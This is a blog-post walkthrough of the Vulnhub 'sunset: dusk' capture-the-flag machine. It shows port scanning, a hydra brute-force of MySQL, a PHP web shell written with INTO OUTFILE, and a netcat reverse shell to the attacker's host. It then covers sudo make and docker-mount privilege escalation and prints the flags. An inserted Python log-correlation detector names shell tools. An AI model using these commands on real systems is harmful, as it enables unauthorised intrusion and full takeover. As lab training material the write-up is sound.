PJzhang: vulnhub target machine, sunset series, SUNSET: DUSK

Mao Ning~~~

 

Address: https://www.vulnhub.com/entry/sunset-dusk,404/

The focus is on the tools and the approach.

nmap 192.168.43.0/24

Target machine IP
192.168.43.200

21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy

nmap -A -p1-65535 192.168.43.200, paying attention to version vulnerabilities in each system service

Visit http://192.168.43.200:8080/ and http://192.168.43.200/

Success, the account and password are root/password
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.43.200 mysql

Log in to the database
mysql -h 192.168.43.200 -u root -P 3306 -p

select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/muma.php' ;

muma.php is now visible at http://192.168.43.200:8080/; the directory it sits in is /var/tmp

http://192.168.43.200:8080/muma.php?cmd=id

http://192.168.43.200:8080/muma.php?cmd=nc%20-e%20/bin/bash%20192.168.43.154%204444

nc -e /bin/bash 192.168.43.154 4444

On the attacking machine: nc -lvnp 4444
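
Seen from the defender's side, the steps above leave two log trails that can be correlated: a MySQL statement that writes PHP with INTO OUTFILE, then web requests for that file. The following is an added detection example, not part of the original post; the log formats, function names and sample lines are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+'([^']+)'", re.I)
PHP_RE = re.compile(r"<\?php|\.php\b", re.I)
# Shell tooling that has no business appearing in a query-string value.
SHELL_RE = re.compile(r"\b(?:nc|ncat|bash|python\d?|perl|wget|curl)\b|/bin/", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def dropped_php_files(mysql_lines):
    """Paths written by INTO OUTFILE/DUMPFILE statements that carry PHP."""
    return [m.group(1) for line in mysql_lines
            if (m := OUTFILE_RE.search(line)) and PHP_RE.search(line)]

def suspicious_requests(access_lines, dropped):
    """(line_no, reason, detail) for hits on a dropped file or a shell command."""
    names = {posixpath.basename(p) for p in dropped}
    hits = []
    for no, line in enumerate(access_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if posixpath.basename(url.path) in names:
            hits.append((no, "dropped-file", url.path))
        # parse_qsl percent-decodes, so %20-encoded commands match as well.
        for key, value in parse_qsl(url.query):
            if SHELL_RE.search(value):
                hits.append((no, "shell-in-query", f"{key}={value}"))
    return hits

# Constructed sample log lines (formats assumed, not captured from the target).
MYSQL_LOG = [
    "2020-09-08T14:01:02Z 12 Query select * from users",
    "2020-09-08T14:02:10Z 12 Query select \"<?php system($_GET['cmd']); ?>\" "
    "into outfile '/var/tmp/muma.php'",
]
ACCESS_LOG = [
    '192.168.43.154 - - [08/Sep/2020:14:03:00 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512',
    '192.168.43.154 - - [08/Sep/2020:14:03:20 +0000] "GET /muma.php?cmd=id HTTP/1.1" 200 54',
    '192.168.43.154 - - [08/Sep/2020:14:03:41 +0000] '
    '"GET /muma.php?cmd=nc%20-e%20/bin/bash%20192.168.43.154%204444 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    found = dropped_php_files(MYSQL_LOG)
    print(found)
    for hit in suspicious_requests(ACCESS_LOG, found):
        print(hit)
```

The request with cmd=id contains no shell keyword and is caught only through the correlation with the dropped file name.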

Obtain a shell
python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l
(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
Escalate privileges to the dusk user
sudo -u dusk make --eval=$'x:\n\t'/bin/bash

Home directory
cat user.txt
08ebacf8f4e43f05b8b8b372df24235b

docker images
docker pull alpine
docker run -v /:/mnt -it alpine
Root privileges obtained

cd /mnt/root
cat root.txt
8930fa079a510ee880fe047d40dc613e

 

posted @ 2020-09-08 22:20  PJzhang